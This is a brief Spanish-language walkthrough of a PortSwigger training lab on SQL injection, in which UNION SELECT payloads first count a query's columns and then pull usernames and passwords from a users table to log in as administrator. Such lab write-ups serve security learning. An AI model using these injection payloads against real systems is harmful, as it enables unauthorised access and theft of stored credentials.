SQL Injection UNION attack, retrieving data from other tables – PortSwigger Write Up
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “SQL Injection UNION attack, retrieving data from other tables.”
Pasos
En este artículo, se solicita obtener la información de nombre de usuario y contraseña en la tabla de usuarios utilizando la vulnerabilidad de inyección SQL.
Comencemos identificando primero el número de columnas:
' UNION SELECT NULL —
'+UNION+SELECT+NULL —
Detectamos que hay 2 columnas.
Para esto, podemos crear la consulta SQL usando la palabra clave UNION de la siguiente manera.
‘ UNION SELECT username,password FROM users —
‘+UNION+SELECT+username,password+FROM+users- -
Iniciemos sesión en el sistema con el usuario administrador.
Después de un inicio de sesión exitoso, completamos el laboratorio.
¡Un saludo y espero que os sirva de apoyo!